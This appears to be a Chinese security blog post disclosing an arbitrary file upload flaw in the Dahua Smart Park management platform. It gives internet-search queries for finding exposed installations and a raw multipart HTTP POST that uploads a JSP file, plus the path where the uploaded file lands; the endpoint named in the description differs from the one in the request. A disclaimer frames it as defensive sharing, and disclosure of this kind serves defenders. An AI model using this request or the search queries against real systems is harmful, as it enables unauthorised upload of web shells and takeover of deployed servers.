大华智慧园区综合管理平台任意文件上传[附POC]

# 拒绝知识星球付费POC

免责声明：

本文章仅用于信息安全防御技术分享，因用于其他用途而产生不良后果,作者不承担任何法律责任，请严格遵循中华人民共和国相关法律法规，禁止做一切违法犯罪行为。

漏洞描述

漏洞描述 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在在野 0day 漏洞，攻击者可以通过请求/emap/devicePoint_addImgIco接口任意上传文件，导致系统被攻击与控制。

关键字

fofa语句:app=”dahua-智慧园区综合管理平台”

鹰图语句：web.body=”/WPMS/asset/lib/gridster/“

漏洞复现

POST /publishing/publishing/material/file/video HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 245Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close
--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"
submit--dd8f988919484abab3816881c55272a7--

/publishingImg/VIDEO/231113221005122552.jsp

检测poc

单个检测：

批量检测：

脚本获取方式：

关注本公众号“知攻善防实验室”，回复“1008”